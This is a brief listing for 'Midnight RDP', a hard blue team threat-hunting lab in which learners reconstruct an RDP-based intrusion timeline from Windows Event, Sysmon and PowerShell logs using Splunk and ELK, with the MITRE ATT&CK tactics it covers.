Midnight RDP

Midnight RDP is a blue team lab that falls under the Threat Hunting category and will cover the following subjects: Splunk, ELK, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Lateral Movement, Command and Control.

Learning Objectives

Reconstruct a sophisticated intrusion's timeline by correlating Windows Event, Sysmon, and PowerShell logs in Splunk, identifying RDP-based initial access, persistence, privilege escalation, and C2.

Categories: Threat Hunting.

MITRE ATT&CK Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Discovery, Lateral Movement, Command and Control.

Tools: ELK, Splunk.

Difficulty: hard.